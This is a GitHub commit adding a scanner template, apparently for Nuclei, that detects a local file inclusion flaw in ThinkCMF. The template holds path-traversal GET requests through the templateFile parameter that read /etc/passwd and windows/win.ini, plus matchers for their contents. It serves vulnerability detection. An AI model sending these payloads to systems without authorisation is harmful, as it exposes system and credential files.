Merge pull request #842 from pikpikcu/patch-55

add thinkcmf-lfi
patch-1
PD-Team 2021-02-11 22:24:20 +05:30 committed by GitHub
commit fbe3433a83
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 27 additions and 0 deletions

View File

@ -0,0 +1,27 @@
id: thinkcmf-lfi
info:
name: ThinkCMF LFI
author: pikpikcu
severity: high
reference: https://www.freebuf.com/vuls/217586.html
tags: thinkcmf,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/?a=display&templateFile=README.md"
- "{{BaseURL}}/?a=display&templateFile=../../../../../../../../../../../../../../../../etc/passwd"
- "{{BaseURL}}/?a=display&templateFile=../../../../../../../../../../../../../../../../windows/win.ini"
matchers-condition: and
matchers:
- type: regex
regex:
- "ThinkCMF"
- "root:[x*]:0:0:"
- "[extensions]"
- type: status
status:
- 200